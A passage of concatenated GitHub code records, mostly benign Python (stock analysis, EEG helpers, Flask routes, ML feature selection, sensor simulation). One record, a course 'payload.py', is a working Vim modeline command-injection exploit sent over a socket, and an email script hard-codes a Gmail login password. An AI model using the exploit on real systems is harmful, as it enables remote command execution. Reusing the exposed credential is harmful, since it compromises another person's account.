__name__ == '__main__':\n base = BaseStock(\"base\")\n stock = base.get_all_stock()\n avg = Avg()\n ball = Boll()\n\n print(\"Save data in:\" + constant.date_file_path)\n for i in range(5):\n analysis_date = \"20190821\"\n trade_data = timeUtil.day_after_day(analysis_date, -1*i)\n print(\"Start---\" + trade_data)\n result_file_path = constant.date_file_path + \"Line5Up10_\" + trade_data + \".txt\"\n # result_file_path = constant.date_file_path + \"Line5Up10.txt\"\n pt.p_file_no_format_add(result_file_path,\n [\"code,date,O,H,L,C,P,Diff,R,count,sum,avg5,avg10,avg20,up_track,avg_line,down_track\".replace(\",\", \"\t\")])\n for one in stock:\n shoot_stock = analysis_stock(one, stock[one], trade_data)\n if shoot_stock is not None:\n print(\" %s(%s):%s\" % (stock[one],one, shoot_stock.get_trade_date()))\n\n after_n_day_trade = base.get_stock_data(shoot_stock.get_ts_code(),\n stock[one],\n shoot_stock.get_trade_date(),\n timeUtil.day_after_day(trade_data, 10)\n )\n message = []\n shoot_avg_result = avg.get_avg(one, stock[one])\n shoot_ball_result = ball.get_boll(one, stock[one])\n for one_stock_data in after_n_day_trade:\n one_messgae = str(one_stock_data)\n\n try:\n shoot_avg_result[one_stock_data.get_trade_date()]\n one_messgae= one_messgae + \",%s,%s,%s\" % (\n shoot_avg_result[one_stock_data.get_trade_date()]['5'],\n shoot_avg_result[one_stock_data.get_trade_date()]['10'],\n shoot_avg_result[one_stock_data.get_trade_date()]['20']\n )\n except:\n one_messgae = one_messgae + \",_,_,_\"\n\n try:\n one_messgae = one_messgae + \",%s,%s,%s\" % (\n shoot_ball_result[one_stock_data.get_trade_date()]['up_track'],\n shoot_ball_result[one_stock_data.get_trade_date()]['avg_line'],\n shoot_ball_result[one_stock_data.get_trade_date()]['down_track']\n )\n except:\n one_messgae = one_messgae + \",_,_,_\"\n\n message.append(one_messgae.replace(\",\", \"\t\"))\n\n pt.p_file_list_with_no_format_add(result_file_path, message)\n\n pt.p_file_no_format_add(result_file_path,\n [\" %s(%s):%s\" % (stock[one], one, shoot_stock.get_trade_date())])\n\n","repo_name":"happyapan/indexAnalysis","sub_path":"stock_strategy/Line5UpXLine10.py","file_name":"Line5UpXLine10.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21036617376","text":"import mne\r\nimport numpy\r\n\r\n\r\ndef load_epochs(raw):\r\n evts,evts_dict = mne.events_from_annotations(raw)\r\n wanted_keys = [e for e in evts_dict.keys() if \"stimulus\" in e]\r\n evts_dict_stim=dict((k, evts_dict[k]) for k in wanted_keys if k in evts_dict)\r\n epochs = mne.Epochs(raw,evts,evts_dict_stim,tmin=-0.5,tmax=1,reject_by_annotation=False)\r\n \r\n return epochs, evts_dict\r\n\t\r\n\r\ndef save_array(filename, to_save):\r\n '''\r\n saves the array in a file with the given filename\r\n '''\r\n with open(filename, 'wb') as f:\r\n numpy.save(f, to_save)\r\n\t\t\r\n\r\ndef load_array_from_memory(filename):\r\n '''\r\n loads the array from the file with the given filename\r\n '''\r\n with open(filename, 'rb') as f:\r\n arr = numpy.load(f)\r\n return arr\r\n\r\n\t\r\ndef get_timepoints(epoch_start, epoch_end, number_of_datapoints):\r\n\t\"\"\"\r\n\tcalculates equidistant timepoints in the time range\r\n\t\"\"\"\r\n\ttime_range = numpy.abs(epoch_end) + numpy.abs(epoch_start)\r\n\tsteps = time_range / number_of_datapoints\r\n\tx = numpy.arange(start=epoch_start, stop=epoch_end, step=steps)\r\n\treturn x","repo_name":"kayroo23/Signalprocessing","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15074894117","text":"# 目录配置\n\nimport os\n\nMUSIC_PATH = \"Music\"\nIMAGE_PATH = \"Image\"\n\n# 数据库配置\n\nimport pymongo\n\nclient = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\nMONGO_DB = client[\"chunsheng\"]\n\n# rest-api\nRET = {\n \"code\": 0,\n \"msg\": \"\",\n \"data\": {}\n}\n","repo_name":"ddt666/ChunSheng","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1055762583","text":"from ast import Num\nfrom flask import Flask\napp= Flask(__name__)\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/dojo')\ndef dojo():\n return 'Dojo!'\n\n@app.route('/say/')\ndef say(name):\n print(name)\n return 'Hi' + ' ' + name +'!'\n\n@app.route('/repeat//')\ndef rep(num,name):\n newName=\"\"\n for x in range(int(num)):\n newName+=name+\" \"\n print(newName)\n return newName\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"karam-taha/flask_fundamentals","sub_path":"routing_task/Understanding_Routing.py","file_name":"Understanding_Routing.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8431078317","text":"\r\nimport fiona\r\n\r\n# ~ gdb_filename = '/mnt/c/Users/Gabriel/Geo_data/Original_SPOT_images.gdb.zip'\r\ngdb_filename = '/mnt/c/Users/Gabriel/Geo_data/Original_SPOT_images.gdb'\r\n\r\n\r\nprint(fiona.listlayers(gdb_filename))\r\n\r\nwith fiona.open(gdb_filename,'r') as gdb_open :\r\n \r\n print(len(gdb_open))\r\n # ~ for a in gdb_open:\r\n # ~ print(a)\r\n","repo_name":"gabrielfougeron/PyTorchLakeSegmentation","sub_path":"Open_gdb/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33397446973","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport socket\nimport argparse\nBASE_PAYLOAD = \":!{}||\\\" vi:fen:fdm=expr:fde=assert_fails(\\\"source\\!\\ \\%\\\"):fdl=0:fdt=\\\"\"\nHOST = \"m1t1.hackback.dev\"\nPORT = 16850\ndef connect(host, port, command):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.sendall(command)\n while True:\n\t data = s.recv(1024)\n\t if data == \"\":\n\t\t break\n\t print(\"Recieved: %s\" % str(repr(data)))\n print(\"Connection Closed\")\n s.close()\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Command for exploiting vim source and modeline vulnerability')\n parser.add_argument('-c', help='Command to run through vim exploit', required=True, dest='command')\n args = parser.parse_args()\n connect(HOST,PORT,BASE_PAYLOAD.format(args.command))\n print(BASE_PAYLOAD.format(args.command))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MCAR43/School-Work","sub_path":"CS4001_OffensiveSecurity/misson1/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9576055133","text":"#!/usr/bin/python\n\nimport sys,os\n\nprev_word = None\nword = None\nprev_fn = None\nfn = None\nfreq_info = {}\n\nfor line in sys.stdin:\n line=line.rstrip()\n ll=line.split('\\t')\n if len(ll) > 1:\n word=ll[0]\n value=int(ll[2])\n fn = os.path.basename(ll[1]) \n\n if word == prev_word:\n freq_info[fn]=value\n else:\n if prev_word != None:\n print(\"{0}:{1}:{2}\".format(prev_word, len(freq_info),freq_info))\n freq_info = {}\n prev_word = word\n freq_info[fn]=value\n \n#if prev_word == word: \nprint(\"{0}:{1}:{2}\".format(word, len(freq_info),freq_info))\n \n","repo_name":"jared-ziqxu/HadoopMapRed","sub_path":"assignment2/task1/reducer1.py","file_name":"reducer1.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72203130198","text":"# https://www.acmicpc.net/problem/5063\n\n# 문제는 개그인듯 ㅡ.ㅡ;;;\n# 첫째 줄에 테스트 케이스의 개수 N\n# 다음 N개의 줄에는 3개의 정수 r, e, c\n# r은 광고를 하지 않았을 때 수익\n# e는 광고를 했을 때의 수익\n# c는 광고 비용\n# 광고를 해야 하면 \"advertise\", 하지 않아야 하면 \"do not advertise\", 광고를 해도 수익이 차이가 없다면 \"does not matter\"를 출력\n# r 과 e-c를 비교\n\nimport sys\nsys.stdin = open('63_TGN.txt')\n\nt = int(input())\nfor _ in range(t):\n r, e, c = map(int, input().split())\n if r < e-c:\n print('advertise')\n elif r == e-c:\n print('does not matter')\n else:\n print('do not advertise')","repo_name":"leesc8408/TIL","sub_path":"0802/63_TGN.py","file_name":"63_TGN.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"19912824058","text":"import importlib\nimport os\nfrom itertools import chain\nfrom types import ModuleType\nfrom typing import Any\nfrom pkg_resources import get_distribution\nfrom typing import TYPE_CHECKING\n\ntry:\n __version__ = get_distribution('sofa').version\nexcept:\n __version__ = \"1.0.0.local\"\n\n\nclass _DynamicModule(ModuleType):\n def __init__(self, name, module_file, import_structure, module_spec=None, extra_objects=None):\n super().__init__(name)\n self._modules = set(import_structure.keys())\n self._class_to_module = {}\n for key, values in import_structure.items():\n for value in values:\n self._class_to_module[value] = key\n # Needed for autocompletion in an IDE\n self.__all__ = list(import_structure.keys()) + list(chain(*import_structure.values()))\n self.__file__ = module_file\n self.__spec__ = module_spec\n self.__path__ = [os.path.dirname(module_file)]\n self._objects = {} if extra_objects is None else extra_objects\n self._name = name\n self._import_structure = import_structure\n\n # Needed for autocompletion in an IDE\n def __dir__(self):\n result = super().__dir__()\n # The elements of self.__all__ that are submodules may or may not be in the dir already, depending on whether\n # they have been accessed or not. So we only add the elements of self.__all__ that are not already in the dir.\n for attr in self.__all__:\n if attr not in result:\n result.append(attr)\n return result\n\n def __getattr__(self, name: str) -> Any:\n if name in self._objects:\n return self._objects[name]\n if name in self._modules:\n value = self._get_module(name)\n elif name in self._class_to_module.keys():\n module = self._get_module(self._class_to_module[name])\n value = getattr(module, name)\n else:\n raise AttributeError(f\"module {self.__name__} has no attribute {name}\")\n\n setattr(self, name, value)\n return value\n\n def _get_module(self, module_name: str):\n try:\n return importlib.import_module(\".\" + module_name, self.__name__)\n except Exception as e:\n raise RuntimeError(\n f\"Failed to import {self.__name__}.{module_name} because of the following error (look up to see its traceback):\\n{e}\"\n ) from e\n\n def __reduce__(self):\n return self.__class__, (self._name, self.__file__, self._import_structure)\n\n\ndef environ(backend):\n os.environ[\"SOFA_BACKEND\"] = backend\n from .models import sbert, veco, SbertConfig, SbertTokenizer, SbertTokenizerFast, SbertModel, SbertForSequenceClassification\n from .models import SbertForTokenClassification, SbertForQuestionAnswering, SbertForMultipleChoice, SbertForPreTraining\n from .models import SbertForMaskedLM, SbertForNextSentencePrediction, VecoConfig, VecoTokenizer\n from .models import VecoTokenizerFast, VecoModel, VecoForSequenceClassification, \\\n VecoForMultipleChoice, VecoForTokenClassification, VecoForQuestionAnswering\n from .models import palm, PalmConfig, PalmTokenizer, PalmTokenizerFast, PalmModel, PalmForConditionalGeneration\n from .utils import inject_model_backend\n inject_model_backend(\"sbert\", \"structbert\", SbertConfig, SbertTokenizer,\n SbertTokenizerFast, backbone=SbertModel,\n sequence_classification=SbertForSequenceClassification,\n token_classification=SbertForTokenClassification,\n question_answering=SbertForQuestionAnswering,\n multiple_choice=SbertForMultipleChoice,\n pre_train=SbertForPreTraining,\n mlm=SbertForMaskedLM,\n nsp=SbertForNextSentencePrediction,\n module=sbert)\n inject_model_backend(\"veco\", \"veco\", VecoConfig, VecoTokenizer,\n VecoTokenizerFast, backbone=VecoModel,\n sequence_classification=VecoForSequenceClassification,\n token_classification=VecoForTokenClassification,\n question_answering=VecoForQuestionAnswering,\n multiple_choice=VecoForMultipleChoice,\n slow_to_fast_converter=\"XLMRobertaTokenizer\",\n module=veco)\n inject_model_backend(\"palm\", \"palm\", PalmConfig, PalmTokenizer,\n PalmTokenizerFast, backbone=PalmModel,\n s2slm=PalmForConditionalGeneration,\n module=palm)\n\n\n_import_structure = {\n \"utils\": [\n \"ChildTuningAdamW\",\n \"apply_child_tuning_to_trainer\",\n \"apply_child_tuning\",\n \"PretrainedConfig\",\n \"TaskType\",\n \"ACT2FN\",\n \"InferenceBase\",\n \"PreTrainedModel\",\n \"Application\",\n \"OnnxConfig\",\n \"apply_chunking_to_forward\",\n \"find_pruneable_heads_and_indices\",\n \"prune_linear_layer\",\n \"ModelOutput\",\n \"logging\",\n \"add_code_sample_docstrings\",\n \"replace_return_docstrings\",\n \"add_start_docstrings\",\n \"add_start_docstrings_to_model_forward\",\n \"add_end_docstrings\",\n \"BaseModelOutputWithPastAndCrossAttentions\",\n \"BaseModelOutputWithPoolingAndCrossAttentions\",\n \"CausalLMOutputWithCrossAttentions\",\n \"MaskedLMOutput\",\n \"MultipleChoiceModelOutput\",\n \"NextSentencePredictorOutput\",\n \"QuestionAnsweringModelOutput\",\n \"SequenceClassifierOutput\",\n \"TokenClassifierOutput\",\n \"DatasetOutput\",\n \"SpanClassifierOutput\",\n \"PreTrainedTokenizer\",\n \"_is_control\",\n \"_is_punctuation\",\n \"_is_whitespace\",\n \"AddedToken\",\n \"PreTrainedTokenizerFast\",\n \"check_update\",\n \"inject_model_backend\",\n \"inject_pipeline\"\n ],\n \"models\": [\n \"sbert\",\n \"veco\",\n \"palm\",\n \"SbertConfig\",\n \"SbertTokenizer\",\n \"SbertTokenizerFast\",\n \"SbertForSequenceClassification\",\n \"SbertModel\",\n \"SbertForQuestionAnswering\",\n \"SbertForTokenClassification\",\n \"SbertForMultipleChoice\",\n \"SbertForPreTraining\",\n \"SbertForMaskedLM\",\n \"SbertForNextSentencePrediction\",\n \"VecoConfig\",\n \"VecoModel\",\n \"VecoForSequenceClassification\",\n \"VecoForMultipleChoice\",\n \"VecoForQuestionAnswering\",\n \"VecoForTokenClassification\",\n \"VecoTokenizer\",\n \"VecoTokenizerFast\",\n \"PalmConfig\",\n \"PalmModel\",\n \"PalmTokenizer\",\n \"PalmTokenizerFast\",\n \"PalmForConditionalGeneration\",\n ],\n \"examples\": [\n \"run_sequence_labeling_hf\",\n \"run_classification_hf\",\n \"run_generation_hf\"\n ],\n \"sofa\": [\n \"environ\"\n ]\n}\n\nif TYPE_CHECKING:\n from .models import (\n sbert,\n veco,\n palm,\n SbertConfig,\n SbertTokenizer,\n SbertTokenizerFast,\n SbertForSequenceClassification,\n SbertModel,\n SbertForQuestionAnswering,\n SbertForTokenClassification,\n SbertForMultipleChoice,\n SbertForPreTraining,\n SbertForMaskedLM,\n SbertForNextSentencePrediction,\n VecoConfig,\n VecoModel,\n VecoForSequenceClassification,\n VecoForMultipleChoice,\n VecoForQuestionAnswering,\n VecoForTokenClassification,\n VecoTokenizer,\n VecoTokenizerFast,\n PalmConfig,\n PalmModel,\n PalmTokenizer,\n PalmTokenizerFast,\n PalmForConditionalGeneration,\n )\n from .examples import (\n run_sequence_labeling_hf,\n run_classification_hf,\n run_generation_hf,\n )\n from .utils import *\nelse:\n import sys\n sys.modules[__name__] = _DynamicModule(\n __name__,\n globals()[\"__file__\"],\n _import_structure,\n module_spec=__spec__,\n extra_objects={\"__version__\": __version__, \"environ\": environ},\n )\n\n","repo_name":"alibaba/AliceMind","sub_path":"sofa/sofa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":1868,"dataset":"github-code","pt":"85"} +{"seq_id":"73535851477","text":"import smtplib\nfrom email.message import EmailMessage\nfrom string import Template\nfrom pathlib import Path\n# p = Path('.')\n\n# print(list(p.glob('**/*.html')))\n\nhtml = Template(Path('email-playground/index.html').read_text())\n\nemail = EmailMessage()\nemail['from'] = 'Arfizur Rahman'\nemail['to'] = 'arfizrahman0@gmail.com'\nemail['subject'] = 'Sending Email via Python'\n\nemail.set_content(html.substitute({'name': 'TinTin'}), 'html')\n\nwith smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:\n smtp.ehlo()\n smtp.starttls()\n smtp.login('rifatrabbi872@gmail.com', 'RifatRabbi872@')\n smtp.send_message(email)\n print('All good boss!')\n","repo_name":"arfizurrahman/python","sub_path":"Scripting with Python/Email/email-playground/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13407486692","text":"from PIL import ImageGrab\nimport cv2\nimport os\nimport platform\nimport pyperclip\nimport pytesseract\nimport time\nimport shutil\n\nOS_NAME = platform.system()\nIMG_EXTENSIONS = [\".jpg\", \".jpeg\", \".png\", \".bmp\"]\nTESSERACT_WINDOWS_PATH = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\nIMG_PATH = \"images\"\n\n\ndef check_image_folder_exist():\n\tif not os.path.exists(IMG_PATH):\n\t\tos.makedirs(IMG_PATH)\n\ndef get_all_images_names():\n\timg_array = []\n\tcheck_image_folder_exist()\n\n\tfor image_name in os.listdir(IMG_PATH):\n\t\tif image_name.lower().endswith(tuple(IMG_EXTENSIONS)):\n\t\t\timg_array.append(image_name)\n\treturn img_array\n\ndef change_image_path_folder(path):\n\tglobal IMG_PATH\n\tIMG_PATH = path\n\ndef get_clipboard_image():\n\treturn ImageGrab.grabclipboard()\n\ndef text_from_clipboard_image(clipboard_image, lang=\"eng\"):\n\tcheck_image_folder_exist()\n\n\tclipboard_image_name = f\"image_{str(time.time())}.jpg\"\n\tclipboard_image.save(f\"images/{clipboard_image_name}\")\n\tclipboard_image_text = recognize_text(clipboard_image_name, lang)\n\n\tos.remove(f\"images/{clipboard_image_name}\")\n\tpyperclip.copy(clipboard_image_text)\n\treturn clipboard_image_text\n\ndef recognize_text(image_full_name, lang=\"eng\"):\n\tfull_path = os.path.abspath(f\"{IMG_PATH}\\{image_full_name}\")\n\t_, file_extension = os.path.splitext(image_full_name)\n\tlocal_image_path = \"images\"\n\tlocal_image_name = f\"image_{str(time.time())}.{file_extension}\"\n\tshutil.copyfile(full_path, f\"{local_image_path}/{local_image_name}\")\n\n\timage = cv2.imread(f\"{local_image_path}/{local_image_name}\")\n\tif OS_NAME == \"Windows\":\n\t\tpytesseract.pytesseract.tesseract_cmd = TESSERACT_WINDOWS_PATH\n\ttext = pytesseract.image_to_string(image, lang).strip()\n\tos.remove(f\"{local_image_path}/{local_image_name}\")\n\n\treturn text\n\ndef text_delimiter(full_text, delimiter_name):\n\tstart = f\" Get best model predictions\n wrapper_mdoel_dict = train_clusteiring_wrapper(\n df, model_sel_params, metrics_computation, initial_recommended_features\n )\n df_with_initial_clusters = wrapper_mdoel_dict[\"df_cluster\"]\n return df_with_initial_clusters\n\n\ndef tree_based_feature_selection(\n df_with_initial_clusters: pd.DataFrame,\n target_based_fs_ranking: pd.DataFrame,\n fs_params: Dict,\n explainer_model_params: Dict,\n importance_model_params: Dict,\n) -> pd.DataFrame:\n \"\"\"Reorder-Supervised FS Ranking into an Unsupervised FS ranking.\n\n Reorder FS ranking according a feature importance model (Random Forest Optimzed with Bayesian Opt),\n an gives explainability insights though an explainer model (DT Optimzed with Bayesian Opt).\n\n Args:\n df_with_initial_clusters (pd.DataFrame): Master table with cluster columns\n target_based_fs_ranking (pd.DataFrame): Target based feature selection ranking.\n fs_params (Dict): Feature selection params.\n explainer_model_params (Dict): Explainer model params.\n importance_model_params (Dict): Importance model params.\n\n Returns:\n pd.DataFrame: Unsupervised Feature Selection Ranking.\n \"\"\"\n # params\n id_col = fs_params[\"customer_id_col\"]\n # initial receommendation from feature selection\n initial_recommended_features = list(target_based_fs_ranking[\"feature\"].values) + [\n id_col\n ]\n # explain clustering predictions with Bagging or Bossting algorithms + tree plot from a decision tree model\n explainer_dict = clustering_explainer(\n df_with_initial_clusters,\n fs_params,\n initial_recommended_features,\n explainer_model_params,\n importance_model_params,\n )\n # initial feature importance from the explainer\n feature_importance_df = explainer_dict[\"feature_importance\"]\n\n # recommend features with feature importance greater than a threshold.\n feature_importance_threshold = fs_params[\"final_ranking\"][\n \"feature_importance_threshold\"\n ]\n recommended_features = feature_importance_df[\n feature_importance_df[\"feature_importance\"] > feature_importance_threshold\n ][\"feature_name\"].to_list()\n\n msg1 = f\"Features recommended to use on the macro clusters embeddings: {recommended_features}\"\n msg2 = f\"wich have a feature importance greater than {feature_importance_threshold}\"\n logger.warning(msg1 + msg2)\n return feature_importance_df\n","repo_name":"matheus695p/classifiers","sub_path":"src/classifiers/pipelines/data_science/feature_selection/feature_selection_nodes.py","file_name":"feature_selection_nodes.py","file_ext":"py","file_size_in_byte":62835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17463807630","text":"from aol_model.aod import Aod\nfrom aol_model.ray import Ray\nfrom aol_model.acoustics import Acoustics\nfrom aol_model.xu_stroud_model import diffract_acousto_optically,diffract_by_wavevector_triangle,get_efficiency\nfrom aol_model.vector_utils import normalise\nimport pytest\nfrom numpy import allclose, all, array, pi\nfrom random import random\nfrom scipy import less_equal, greater_equal\n\nacoustics = Acoustics(40e6)\naod = Aod([0,0,1], [1,0,0], 1e-3, 1e-3, 1e-3)\norder = 1\nwavelen = 800e-9\n\ndef test_efficiency_range():\n \n def eff_fun():\n v = normalise([random(),random(),10])\n rays_in = [Ray([0,0,0],v,wavelen,1)]\n rays_out = [Ray([0,0,0],v,wavelen,1)]\n wavevecs_in_mag = [r.wavevector_vac_mag for r in rays_in]\n wavevecs_in_unit = [r.wavevector_unit for r in rays_in] \n wavevecs_out_mag = [r.wavevector_vac_mag for r in rays_out]\n wavevecs_out_unit = [r.wavevector_unit for r in rays_out] \n return get_efficiency(aod, random(), wavevecs_in_mag, wavevecs_in_unit, wavevecs_out_mag, wavevecs_out_unit, [acoustics], (0,1))\n \n effs = [ eff_fun() for _ in range(100) ]\n assert all(less_equal(effs,1)) and all(greater_equal(effs,0)) \n\ndef test_order_sym():\n r1 = Ray([0,0,0],[-17./145,0,144./145],wavelen)\n r2 = Ray([0,0,0],[ 17./145,0,144./145],wavelen)\n \n diffract_acousto_optically(aod, [r1], [acoustics], -1)\n diffract_acousto_optically(aod, [r2], [acoustics], 1)\n \n opposite_xcomps = allclose(r1.wavevector_unit[0], -r2.wavevector_unit[0])\n assert allclose(r1.energy, r2.energy) and opposite_xcomps \n\ndef test_wavevector_triangle():\n wavevec_unit = array([0,0,1])\n wavevec_mag = 2 * pi / wavelen \n (wavevector_mismatch_mag, wavevectors_out_unit, wavevectors_vac_mag_out) = diffract_by_wavevector_triangle(aod, array([wavevec_unit]), [wavevec_mag], [acoustics], order, (0,1))\n k_i = wavevec_unit * wavevec_mag * aod.calc_refractive_indices_vectors([wavevec_unit], wavelen)[0][0]\n k_d = wavevectors_out_unit * wavevectors_vac_mag_out * aod.calc_refractive_indices_vectors(wavevectors_out_unit, wavelen)[1] # get ord branch, the first of\n K = acoustics.wavevector(aod) * order\n zero_sum = k_i + order * K + aod.normal * wavevector_mismatch_mag - k_d[0]\n assert allclose(zero_sum, 0, atol=0.2, rtol=0)\n\ndef test_setting_invalid_mode():\n with pytest.raises(ValueError):\n ray = Ray([0,0,0,], [0,0,1], wavelen)\n diffract_acousto_optically(aod, [ray], [acoustics], 2)\n \nif __name__ == '__main__':\n test_wavevector_triangle()","repo_name":"GeoffEvans/aol_model","sub_path":"aol_model/tests/test_xu_stroud_model.py","file_name":"test_xu_stroud_model.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"22274159782","text":"from random import seed \nfrom random import gauss \n\n\npressure_sensor_relative_accuracy = 8 # pa \npressure_sensor_absolute_accuracy = 50 # pa\n\naccelerometer_sensor_relative_accuracy = 0.03 # % accuracy \naccelerometer_sensor_absolute_accuracy = 0 \n\nclass SensorDataCreator: \n def __init__(self, flight_data):\n # break down the flight data into individual arrays \n\n # create the sensor data at a given time step for each sensor \n self._pressure_data_time_step = 0.05 \n self._accel_data_time_step = 0.01\n \n self._position_data = []\n self._acceleration_data = [] \n self._attitude_data = [] \n self._time = [] \n # break apart the sensor data \n for i in flight_data: \n self._position_data.append(i['position']) \n self._acceleration_data.append(i['acceleration'])\n self._attitude_data.append(i['attitude']) \n self._time.append(i['flight_time']) \n\n self._pressure_sensor_data = self.create_pressure_sensor_data(self._position_data, self._time, self._pressure_data_time_step) \n self._accel_sensor_data = self.create_accel_sensor_data(self._acceleration_data, self._time, self._accel_data_time_step)\n # self.accel_data = self.create_accel_sensor_data()\n print(self._pressure_sensor_data)\n\n\n def get_pressure_sensor_data(self, time):\n # step through to find the time \n # start with a guess based on the time \n index_guess = time / self._pressure_data_time_step - 1 \n if(index_guess < 0):\n index_guess = 0 \n elif(index_guess > len(self._pressure_sensor_data)):\n index_guess = len(self.create_accel_sensor_data) - 1 \n # return the data at the index \n return self._pressure_sensor_data[index_guess][0]\n \n \n\n\n def create_pressure_sensor_data(self, altitude_data, time_data, sensor_time_step):\n # simulate pressure sensor data \n # make the data lag behind the actual altitude \n # add gaussian noise \n alt_press = [\n [-1000, 113900],\n [0, 101325],\n [1000, 89880],\n [2000, 79500],\n [3000, 70120],\n [4000, 61660]\n ]\n\n # calculate the ideal air pressure at all altitudes \n ideal_pressure = [] \n \n for a in altitude_data: \n altitude = a[2] \n # calc pressure \n iter = 1\n done = False \n while(iter < len(alt_press) and not done): \n if(altitude < alt_press[iter][0]):\n delta_p = alt_press[iter][1] - alt_press[iter - 1][1] \n delta_a = alt_press[iter][0] - alt_press[iter - 1][0]\n pressure = alt_press[iter - 1][1] + (altitude - alt_press[iter - 1][0]) * delta_p / delta_a \n ideal_pressure.append(pressure)\n done = True \n iter += 1 \n #print(\"Done 1\")\n # print(ideal_pressure)\n # return ideal_pressure\n # give the data a lag \n start_pressure = ideal_pressure[0] \n lagged_data = [start_pressure] \n for i in range(1, len(ideal_pressure)):\n delta_t = time_data[i] - time_data[i - 1]\n delat_p = ideal_pressure[i] - ideal_pressure[i - 1]\n lagged_data.append(ideal_pressure[i]) # todo test out this model \n # print(\"Done 2\")\n # give the pressure data a constant offset \n offset = gauss(0, pressure_sensor_absolute_accuracy) \n # add the offset everywhere \n lagged_offset_pressure = []\n for i in range(0, len(lagged_data)): \n lagged_offset_pressure.append(lagged_data[i] + offset) \n\n # match the sensor time step and add gaussian noise \n elements = (int)(time_data[-1] / sensor_time_step + 0.5) \n # print(\"Elements: \", elements)\n data = [] \n sens_time = 0 \n index = 1 \n while(index < len(time_data) - 2): \n # find the appropriate time \n if(sens_time > time_data[index]): \n index += 1 \n delta_p = lagged_offset_pressure[index] - lagged_offset_pressure[index - 1]\n delta_t = time_data[index] - time_data[index + 1] \n approx = lagged_offset_pressure[index - 1] + (sens_time - time_data[index]) * delat_p / delta_t\n data.append([gauss(approx, pressure_sensor_relative_accuracy), sens_time]) \n sens_time += sensor_time_step \n \n return data \n\n def create_accel_sensor_data(self, acceleration_data, time_data, sensor_time_step): \n # simulate acceleration data \n # give the data a small scale offset \n # add gaussian noise \n\n #offset = gauss(0, accelerometer_sensor_absolute_accuracy) \n # add the offset as a percentage \n\n # create the sensor data at the requested frequency \n elements = (int)(time_data[-1] / sensor_time_step + 0.5) \n # print(\"Elements: \", elements)\n data = [] \n sens_time = 0 \n index = 1 \n while(index < len(time_data) - 2): \n # find the appropriate time \n if(sens_time > time_data[index]): \n index += 1 \n delta_a = acceleration_data[index][2] - acceleration_data[index - 1][2]\n delta_t = time_data[index] - time_data[index + 1] \n approx = acceleration_data[index - 1][2] + (sens_time - time_data[index]) * delta_a / delta_t\n data.append([approx, sens_time]) \n sens_time += sensor_time_step \n\n # add nonlinearity error to the data \n non_linear_data = [] \n for i in data:\n non_linear_data.append((gauss(i[0], 0.03*i[0]),i[1])) \n \n # add the absolute error to the data \n noisy_data = []\n for i in non_linear_data:\n noisy_data.append([i[0] + gauss(0, 0.05),i[1]])\n \n\n # return data \n return noisy_data \n \n\n \n\n\n\nif __name__ == \"__main__\":\n import SimulationKinematics \n from SimulationKinematics import rocket_data, rocket_state, simulation_settings\n test_rocket = rocket_data; \n test_rocket['dry_mass'] = 11.5 \n test_rocket['drag_reference_area'] = 0.0103\n test_rocket['drag_cd_v'] = [[0.46, 0], [0.43, 34.3], [0.43, 68.6], [0.44, 102.9], [0.46,137.2], [0.47, 171.5], [0.5, 205.8], [0.53, 240.1]]\n test_rocket['motor_file_name'] = \"./Cesaroni_2788L1030-P.rse\"\n sim_settings = simulation_settings \n sim_settings['time_step'] = 0.05\n simulation = SimulationKinematics.SimulationKinematics(test_rocket, sim_settings)\n data = simulation.simulate() \n\n sensor = SensorDataCreator(data)\n ","repo_name":"jeremymdunne/PeregrineGroundStation","sub_path":"SensorDataCreator.py","file_name":"SensorDataCreator.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24495478469","text":"import urllib\nimport os\nimport pytz\nimport datetime\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom read_exosite import dataCapture\nfrom read_exosite import icCapture\n\nimport webapp2\nimport jinja2\nimport random\n\n# Tell program where your templates are\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + \"/templates\"),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\ndef datetimeformat(value, 